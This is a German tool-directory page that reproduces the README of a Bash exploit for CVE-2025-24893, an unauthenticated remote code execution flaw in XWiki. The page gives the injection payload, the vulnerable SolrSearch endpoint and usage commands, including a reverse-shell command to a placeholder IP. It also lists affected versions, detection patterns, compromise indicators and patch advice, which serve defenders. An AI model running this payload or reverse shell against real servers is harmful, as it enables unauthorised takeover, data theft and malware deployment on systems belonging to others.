Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
XWiki-Platform-RCE-CVE-2025-24893 — Bash-Exploit für CVE-2025-24893, unauthhentifizierte RCE in XWiki Platform, unter Verwendung von Template-Injection im SolrSearch-Makro, um beliebige Systembefehle auszuführen. | Kitploit
Tools/GitHubGitHub/0xdtc/xwiki-platform-rce-cve-2025-24893
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHub0xdtc/xwiki-platform-rce-cve-2025-24893

XWiki-Platform-RCE-CVE-2025-24893

Bash-Exploit für CVE-2025-24893, unauthhentifizierte RCE in XWiki Platform, unter Verwendung von Template-Injection im SolrSearch-Makro, um beliebige Systembefehle auszuführen.

Repository anzeigen
40vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

XWiki Platform – Nicht authentifizierter RCE-Exploit

Übersicht

Dieses Skript ist eine überarbeitete Bash-Implementierung eines Exploits, der auf von CVE-2025-24893 betroffene XWiki-Plattform-Versionen abzielt. Es nutzt eine kritische, nicht authentifizierte Schwachstelle zur Remote-Codeausführung aus, die es Angreifern ermöglicht, beliebigen Groovy-Code über einen Template-Injection-Fehler im SolrSearch-Macro auszuführen.

Die ursprünglichen Exploit-Implementierungen in Python wurden von verschiedenen Sicherheitsforschern erstellt und werden hier für Bash-Benutzer mit vereinfachter Ausführung und verbesserter Benutzerfreundlichkeit angepasst.

Details zur Schwachstelle

  • Entdecker: John Kwak (Trend Micro's Zero Day Initiative)
  • CVE: CVE-2025-24893
  • CVSS-Score: 9,8 (Kritisch)
  • Referenzen:
    • XWiki Official Security Advisory (GHSA-rr6p-3pfg-562j)
    • CISA Known Exploited Vulnerabilities Catalog
    • VulnCheck – XWiki CVE-2025-24893 Exploited in the Wild
    • OffSec Blog – Unauthenticated RCE in XWiki
  • Beschreibung: Die Schwachstelle resultiert aus einer unzureichenden Eingabebereinigung im SolrSearch-Macro innerhalb der XWiki-Plattform. Das Macro validiert und bereinigt die vom Benutzer bereitgestellte Eingabe im Parameter text nicht ordnungsgemäß, wenn auf den RSS-Medienendpunkt zugegriffen wird, sodass Angreifer ohne Authentifizierung schädlichen Groovy-Code in die Rendering-Pipeline einschleusen können.

Betroffene und gepatchte Versionen

Betroffene Versionen

  • XWiki-Plattform: 5.3-milestone-2 bis 15.10.10
  • XWiki-Plattform: 16.0.0-rc-1 bis 16.4.0

Gepatchte Versionen

  • XWiki 15.10.11 oder neuer
  • XWiki 16.4.1 oder neuer
  • XWiki 16.5.0RC1 oder neuer

Funktionen

  • Nicht authentifizierte RCE: Ausführen beliebiger Systembefehle ohne Authentifizierung.
  • CSRF-Token-Umgehung: Nutzt Template-Injection ohne CSRF-Token.
  • Hintergrundausführung: Führt Befehle asynchron auf dem Zielserver aus.
  • Einfache Kommandozeilenschnittstelle: Einfach zu bedienendes Bash-Skript mit minimalen Abhängigkeiten.

Voraussetzungen

  • Abhängigkeiten:
    • curl: Zum Senden von HTTP-Anfragen.
    • jq: Zur URL-Kodierung des Payloads.
    • Bash-Shell.
  • Getestete Umgebung: Linux-Betriebssystem mit Bash.

Verwendung

Erteilen Sie die Ausführungsberechtigungen:

chmod +x CVE-2025-24893

Führen Sie das Skript mit den erforderlichen Argumenten aus:

./CVE-2025-24893 <ziel_url> <befehl>

Parameter

ParameterBeschreibung
<ziel_url>Die Ziel-XWiki-URL (z. B. http://beispiel.de oder https://xwiki.beispiel.org). Das Protokoll ist optional.
<befehl>Der Systembefehl, der auf dem Zielserver ausgeführt werden soll.

Beispiel

Prüfen, ob das Ziel angreifbar ist (Befehl id ausführen):

./CVE-2025-24893 http://verwundbares-xwiki.beispiel.de "id"

Systeminformationen abrufen:

./CVE-2025-24893 http://verwundbares-xwiki.beispiel.de "uname -a"

Eine Testdatei erstellen:

./CVE-2025-24893 http://verwundbares-xwiki.beispiel.de "touch /tmp/pwned"

Reverse Shell (ersetzen Sie Ihre IP und Ihren Port):

./CVE-2025-24893 http://verwundbares-xwiki.beispiel.de "bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'"

Skript-Workflow

  1. Parsen der Kommandozeilenargumente:

    • Validiert, dass sowohl Ziel-URL als auch Befehl angegeben wurden.
    • Normalisiert die URL, indem http:// hinzugefügt wird, falls kein Protokoll angegeben ist.
  2. Payload-Konstruktion:

    • Erstellt einen Groovy-Code-Payload, der den angegebenen Befehl mittels .execute() ausführt.
    • Verpackt den Payload in die XWiki-Macro-Syntax: }}}{{async async=false}}{{groovy}}<code>{{/groovy}}{{/async}}
  3. URL-Kodierung:

    • URL-kodiert den Payload mittels jq für eine ordnungsgemäße HTTP-Übertragung.
  4. Exploitation:

    • Sendet eine HTTP-GET-Anfrage an den verwundbaren SolrSearch-Endpunkt: /xwiki/bin/get/Main/SolrSearch?media=rss&text=<codierter_payload>
    • Der Befehl wird im Hintergrund auf dem Zielserver ausgeführt.

Technische Details

Ausnutzungsmechanismus

Die Exploit-Kette funktioniert wie folgt:

  1. Template-Injection: Der Angreifer erstellt einen schädlichen Payload, der Groovy-Code in XWiki-Macro-Syntax enthält.
  2. Endpunkt-Auswahl: Der Payload wird an den verwundbaren SolrSearch-RSS-Endpunkt gesendet.
  3. Code-Ausführung: Der injizierte Groovy-Code wird serverseitig ohne Authentifizierung ausgeführt.
  4. System-Kompromittierung: Der Angreifer erlangt eine beliebige Codeausführung mit den Privilegien der XWiki-Anwendung.

Payload-Struktur

}}}{{async async=false}}{{groovy}}'<befehl>'.execute();{{/groovy}}{{/async}}
  • }}} – Schließt einen vorhandenen Macro-Kontext
  • {{async async=false}} – Stellt die synchrone Ausführung sicher
  • {{groovy}}...{{/groovy}} – Verpackt den schädlichen Groovy-Code
  • '<befehl>'.execute(); – Führt den angegebenen Systembefehl aus

Proof of Concept

Einrichtung der angreifbaren Umgebung

Zu Testzwecken können Sie eine verwundbare XWiki-Instanz mittels Docker einrichten:

docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10

Ausnutzungsdemo

# Warten, bis XWiki gestartet ist (kann 1–2 Minuten dauern)
./CVE-2025-24893 http://localhost:8080 "whoami"

Auswirkungen

Eine erfolgreiche Ausnutzung dieser Schwachstelle ermöglicht einem nicht authentifizierten Angreifer:

  • Ausführen beliebiger Systembefehle auf dem Server
  • Lesen, Ändern oder Löschen sensibler Daten
  • Kompromittierung der gesamten XWiki-Installation
  • Zugriff auf andere Systeme im Netzwerk (Pivoting)
  • Bereitstellen von Kryptominern oder anderer Schadsoftware
  • Einrichten eines persistenten Hintertürzugangs

Realweltliche Ausnutzung

Laut CISA und mehreren Sicherheitsanbietern:

  • Aktive Ausnutzung: CVE-2025-24893 wird derzeit aktiv im Internet ausgenutzt
  • Angriffskampagnen: VulnCheck entdeckte zweistufige Angriffsketten, die Kryptominer einsetzen
  • CISA KEV-Katalog: Am 30. Oktober 2025 in den Katalog bekannter ausgenutzter Schwachstellen aufgenommen
  • Weit verbreitetes Scannen: Massenhaftes Internet-weites Scannen nach anfälligen Instanzen

Erkennung und Abhilfe

Erkennung

Überwachen Sie verdächtige Anfragen an den SolrSearch-Endpunkt:

GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*

Achten Sie auf Muster, die Folgendes enthalten:

  • {{groovy}}
  • {{async}}
  • .execute()
  • URL-kodierte Varianten der obigen Muster

Indikatoren einer Kompromittierung (IoCs)

  • Unerwartete Prozesse, die durch den XWiki-Anwendungsbenutzer gestartet wurden
  • Neue Dateien in /tmp oder anderen beschreibbaren Verzeichnissen
  • Ausgehende Netzwerkverbindungen zu unbekannten IPs
  • Kryptominer-Prozesse (hohe CPU-Auslastung)

Abhilfemaßnahmen

  1. XWiki upgraden auf eine gepatchte Version:
    • Version 15.10.11 oder höher
    • Version 16.4.1 oder höher
    • Version 16.5.0RC1 oder höher
Tool herunterladen